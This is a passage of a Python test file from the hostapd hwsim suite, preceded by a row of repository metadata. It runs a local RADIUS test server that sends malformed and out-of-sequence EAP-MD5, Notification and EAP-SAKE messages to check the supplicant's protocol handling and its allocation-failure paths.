| 29.892583 | 78 | 0.62731 | 3,636 | 23,376 | 3.893839 | 0.063806 | 0.039412 | 0.009959 | 0.038989 | 0.862692 | 0.844823 | 0.83783 | 0.811343 | 0.799972 | 0.775251 | 0 | 0.057048 | 0.268866 | 23,376 | 781 | 79 | 29.930858 | 0.771342 | 0.021603 | 0 | 0.782609 | 0 | 0 | 0.219976 | 0.00105 | 0 | 0 | 0.000438 | 0 | 0.065217 | 1 | 0.056522 | false | 0.008696 | 0.021739 | 0 | 0.088406 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
46703f7c204c151f1d8f2f846b41046221aa922f | 370,854 | py | Python | tests/hwsim/test_eap_proto.py | yoavst/hostapd-atrik | 92faf1451d22064686b44bfb9ca94f90deb46197 | [
"Unlicense"
] | 1 | 2021-09-02T17:23:10.000Z | 2021-09-02T17:23:10.000Z | tests/hwsim/test_eap_proto.py | yoavst/hostapd-atrik | 92faf1451d22064686b44bfb9ca94f90deb46197 | [
"Unlicense"
] | null | null | null | tests/hwsim/test_eap_proto.py | yoavst/hostapd-atrik | 92faf1451d22064686b44bfb9ca94f90deb46197 | [
"Unlicense"
] | null | null | null | # EAP protocol tests
# Copyright (c) 2014-2015, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import binascii
import hashlib
import hmac
import logging
logger = logging.getLogger()
import os
import select
import struct
import threading
import time
import hostapd
from utils import HwsimSkip, alloc_fail, fail_test, wait_fail_trigger
from test_ap_eap import check_eap_capa, check_hlr_auc_gw_support, int_eap_server_params
from test_erp import check_erp_capa
try:
import OpenSSL
openssl_imported = True
except ImportError:
openssl_imported = False
EAP_CODE_REQUEST = 1
EAP_CODE_RESPONSE = 2
EAP_CODE_SUCCESS = 3
EAP_CODE_FAILURE = 4
EAP_CODE_INITIATE = 5
EAP_CODE_FINISH = 6
EAP_TYPE_IDENTITY = 1
EAP_TYPE_NOTIFICATION = 2
EAP_TYPE_NAK = 3
EAP_TYPE_MD5 = 4
EAP_TYPE_OTP = 5
EAP_TYPE_GTC = 6
EAP_TYPE_TLS = 13
EAP_TYPE_LEAP = 17
EAP_TYPE_SIM = 18
EAP_TYPE_TTLS = 21
EAP_TYPE_AKA = 23
EAP_TYPE_PEAP = 25
EAP_TYPE_MSCHAPV2 = 26
EAP_TYPE_TLV = 33
EAP_TYPE_TNC = 38
EAP_TYPE_FAST = 43
EAP_TYPE_PAX = 46
EAP_TYPE_PSK = 47
EAP_TYPE_SAKE = 48
EAP_TYPE_IKEV2 = 49
EAP_TYPE_AKA_PRIME = 50
EAP_TYPE_GPSK = 51
EAP_TYPE_PWD = 52
EAP_TYPE_EKE = 53
EAP_TYPE_EXPANDED = 254
# Type field in EAP-Initiate and EAP-Finish messages
EAP_ERP_TYPE_REAUTH_START = 1
EAP_ERP_TYPE_REAUTH = 2
EAP_ERP_TLV_KEYNAME_NAI = 1
EAP_ERP_TV_RRK_LIFETIME = 2
EAP_ERP_TV_RMSK_LIFETIME = 3
EAP_ERP_TLV_DOMAIN_NAME = 4
EAP_ERP_TLV_CRYPTOSUITES = 5
EAP_ERP_TLV_AUTHORIZATION_INDICATION = 6
EAP_ERP_TLV_CALLED_STATION_ID = 128
EAP_ERP_TLV_CALLING_STATION_ID = 129
EAP_ERP_TLV_NAS_IDENTIFIER = 130
EAP_ERP_TLV_NAS_IP_ADDRESS = 131
EAP_ERP_TLV_NAS_IPV6_ADDRESS = 132
def run_pyrad_server(srv, t_stop, eap_handler):
srv.RunWithStop(t_stop, eap_handler)
def start_radius_server(eap_handler):
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
eap = ""
for p in pkt[79]:
eap += p
eap_req = self.eap_handler(self.ctx, eap)
reply = self.CreateReplyPacket(pkt)
if eap_req:
while True:
if len(eap_req) > 253:
reply.AddAttribute("EAP-Message", eap_req[0:253])
eap_req = eap_req[253:]
else:
reply.AddAttribute("EAP-Message", eap_req)
break
else:
logger.info("No EAP request available")
reply.code = pyrad.packet.AccessChallenge
hmac_obj = hmac.new(reply.secret)
hmac_obj.update(struct.pack("B", reply.code))
hmac_obj.update(struct.pack("B", reply.id))
# reply attributes
reply.AddAttribute("Message-Authenticator",
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
attrs = reply._PktEncodeAttributes()
# Length
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(pkt.authenticator)
hmac_obj.update(attrs)
del reply[80]
reply.AddAttribute("Message-Authenticator", hmac_obj.digest())
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_stop, eap_handler):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_stop = t_stop
self.eap_handler = eap_handler
self.ctx = {}
while not t_stop.is_set():
for (fd, event) in self._poll.poll(200):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
"radius",
"localhost")
srv.BindToAddress("")
t_stop = threading.Event()
t = threading.Thread(target=run_pyrad_server, args=(srv, t_stop, eap_handler))
t.start()
return { 'srv': srv, 'stop': t_stop, 'thread': t }
def stop_radius_server(srv):
srv['stop'].set()
srv['thread'].join()
def start_ap(ap):
params = hostapd.wpa2_eap_params(ssid="eap-test")
params['auth_server_port'] = "18138"
hapd = hostapd.add_ap(ap, params)
return hapd
def test_eap_proto(dev, apdev):
"""EAP protocol tests"""
check_eap_capa(dev[0], "MD5")
def eap_handler(ctx, req):
logger.info("eap_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success - id off by 2")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] + 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success - id off by 3")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] + 2, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('A'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('B'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('C'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('D'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('E'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request (same id)")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'] - 1,
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('F'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 2, 4)
return None
srv = start_radius_server(eap_handler)
try:
hapd = start_ap(apdev[0])
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=1)
if ev is not None:
raise Exception("Unexpected EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION A":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION B":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION C":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION D":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION E":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION F":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
def test_eap_proto_notification_errors(dev, apdev):
"""EAP Notification errors"""
def eap_handler(ctx, req):
logger.info("eap_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('A'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('A'))
return None
srv = start_radius_server(eap_handler)
try:
hapd = start_ap(apdev[0])
with alloc_fail(dev[0], 1, "eap_sm_processNotify"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "eap_msg_alloc;sm_EAP_NOTIFICATION_Enter"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
finally:
stop_radius_server(srv)
EAP_SAKE_VERSION = 2
EAP_SAKE_SUBTYPE_CHALLENGE = 1
EAP_SAKE_SUBTYPE_CONFIRM = 2
EAP_SAKE_SUBTYPE_AUTH_REJECT = 3
EAP_SAKE_SUBTYPE_IDENTITY = 4
EAP_SAKE_AT_RAND_S = 1
EAP_SAKE_AT_RAND_P = 2
EAP_SAKE_AT_MIC_S = 3
EAP_SAKE_AT_MIC_P = 4
EAP_SAKE_AT_SERVERID = 5
EAP_SAKE_AT_PEERID = 6
EAP_SAKE_AT_SPI_S = 7
EAP_SAKE_AT_SPI_P = 8
EAP_SAKE_AT_ANY_ID_REQ = 9
EAP_SAKE_AT_PERM_ID_REQ = 10
EAP_SAKE_AT_ENCR_DATA = 128
EAP_SAKE_AT_IV = 129
EAP_SAKE_AT_PADDING = 130
EAP_SAKE_AT_NEXT_TMPID = 131
EAP_SAKE_AT_MSK_LIFE = 132
def test_eap_proto_sake(dev, apdev):
"""EAP-SAKE protocol tests"""
global eap_proto_sake_test_done
eap_proto_sake_test_done = False
def sake_challenge(ctx):
logger.info("Test: Challenge subtype")
return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
EAP_SAKE_AT_RAND_S, 18, 0, 0, 0, 0)
def sake_handler(ctx, req):
logger.info("sake_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'], 4 + 1,
EAP_TYPE_SAKE)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype without any attributes")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype")
return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 4, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype (different session id)")
return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 1, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_PERM_ID_REQ, 4, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with too short attribute")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with truncated attribute")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with too short attribute header")
payload = struct.pack("B", EAP_SAKE_AT_ANY_ID_REQ)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with AT_IV but not AT_ENCR_DATA")
payload = struct.pack("BB", EAP_SAKE_AT_IV, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with skippable and non-skippable unknown attribute")
payload = struct.pack("BBBB", 255, 2, 127, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_RAND_P with invalid payload length")
payload = struct.pack("BB", EAP_SAKE_AT_RAND_P, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_MIC_P with invalid payload length")
payload = struct.pack("BB", EAP_SAKE_AT_MIC_P, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_PERM_ID_REQ with invalid payload length")
payload = struct.pack("BBBBBBBBBBBBBB",
EAP_SAKE_AT_SPI_S, 2,
EAP_SAKE_AT_SPI_P, 2,
EAP_SAKE_AT_ENCR_DATA, 2,
EAP_SAKE_AT_NEXT_TMPID, 2,
EAP_SAKE_AT_PERM_ID_REQ, 4, 0, 0,
EAP_SAKE_AT_PERM_ID_REQ, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_PADDING")
payload = struct.pack("BBBBBB",
EAP_SAKE_AT_PADDING, 3, 0,
EAP_SAKE_AT_PADDING, 3, 1)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_MSK_LIFE")
payload = struct.pack(">BBLBBH",
EAP_SAKE_AT_MSK_LIFE, 6, 0,
EAP_SAKE_AT_MSK_LIFE, 4, 0)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with invalid attribute length")
payload = struct.pack("BB", EAP_SAKE_AT_ANY_ID_REQ, 0)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown subtype")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, 123)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge subtype without any attributes")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge subtype with too short AT_RAND_S")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
EAP_SAKE_AT_RAND_S, 2)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Identity subtype")
return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 4, 0)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Challenge subtype")
return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
EAP_SAKE_AT_RAND_S, 18, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Confirm subtype without any attributes")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Confirm subtype with too short AT_MIC_S")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
EAP_SAKE_AT_MIC_S, 2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Confirm subtype")
return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
EAP_SAKE_AT_MIC_S, 18, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Confirm subtype with incorrect AT_MIC_S")
return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
EAP_SAKE_AT_MIC_S, 18, 0, 0, 0, 0)
global eap_proto_sake_test_done
if eap_proto_sake_test_done:
return sake_challenge(ctx)
logger.info("No more test responses available - test case completed")
eap_proto_sake_test_done = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(sake_handler)
try:
hapd = start_ap(apdev[0])
while not eap_proto_sake_test_done:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
logger.info("Too short password")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcd",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
finally:
stop_radius_server(srv)
def test_eap_proto_sake_errors(dev, apdev):
"""EAP-SAKE local error cases"""
check_eap_capa(dev[0], "SAKE")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(1, 3):
with alloc_fail(dev[0], i, "eap_sake_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ ( 1, "eap_msg_alloc;eap_sake_build_msg;eap_sake_process_challenge" ),
( 1, "=eap_sake_process_challenge" ),
( 1, "eap_sake_compute_mic;eap_sake_process_challenge" ),
( 1, "eap_sake_build_msg;eap_sake_process_confirm" ),
( 1, "eap_sake_compute_mic;eap_sake_process_confirm" ),
( 2, "eap_sake_compute_mic;eap_sake_process_confirm" ),
( 1, "eap_sake_getKey" ),
( 1, "eap_sake_get_emsk" ),
( 1, "eap_sake_get_session_id" ) ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user@domain",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
erp="1",
wait_connect=False)
